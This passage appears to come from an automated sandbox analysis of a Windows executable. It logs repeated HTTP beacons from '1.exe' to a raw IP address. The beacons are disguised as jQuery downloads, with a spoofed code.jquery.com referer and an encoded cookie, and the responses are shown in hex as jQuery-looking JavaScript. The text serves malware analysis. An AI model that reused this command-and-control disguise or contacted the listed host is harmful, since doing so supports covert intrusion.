                                2025-01-02 09:34:24 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                9192.168.2.54975545.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:25 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:26 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:25 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5628
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:26 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                10192.168.2.54976645.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:27 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:27 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:27 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5649
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:27 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                11192.168.2.54978245.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:29 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:29 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:29 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5692
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:29 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                12192.168.2.54979445.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:31 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:31 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:31 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5649
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:31 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                13192.168.2.54980945.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:32 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:33 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:33 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5671
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:33 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                14192.168.2.54982245.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:34 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:35 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:35 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5692
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:35 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                15192.168.2.54983645.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:36 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:37 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:37 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5649
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:37 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                16192.168.2.54984945.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:38 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:39 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:39 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5649
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:39 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                17192.168.2.54986345.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:40 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:41 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:41 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5671
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:41 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                18192.168.2.54987845.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:42 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:43 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:42 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5628
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:43 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                19192.168.2.54989045.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:44 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
